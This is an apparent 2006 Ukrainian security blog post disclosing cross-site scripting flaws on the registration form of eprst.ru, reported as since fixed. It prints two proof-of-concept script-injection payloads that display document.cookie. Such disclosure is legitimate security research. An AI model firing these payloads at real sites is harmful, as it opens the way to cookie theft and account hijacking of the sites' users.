« Добірка експлоітів
Уразливість на www.ropeofsilicon.com »

Уразливості на www.eprst.ru

20:40 05.09.2006

28.08.2006

На початку місяця, 06.08.2006, знайшов декілька Cross-Site Scripting уразливостей на відомому проекті http://www.eprst.ru. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше.

05.09.2006

XSS:

На сторінці http://www.eprst.ru/register.php при відправлені POST запиту:

В полі “URL головной страницы”:
"><script>alert(document.cookie)</script>
В полі “Ключевые слова”:
</textarea><script>alert(document.cookie)</script>

P.S.

Уразливості вже виправлені.

Причому, хоча б повідомили, що виправили уразливості (я вже не кажу, що потрібно спасибі сказати). Навіть не подумали.


This entry was posted on 20:40 05.09.2006 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.

Leave a Reply

You must be logged in to post a comment.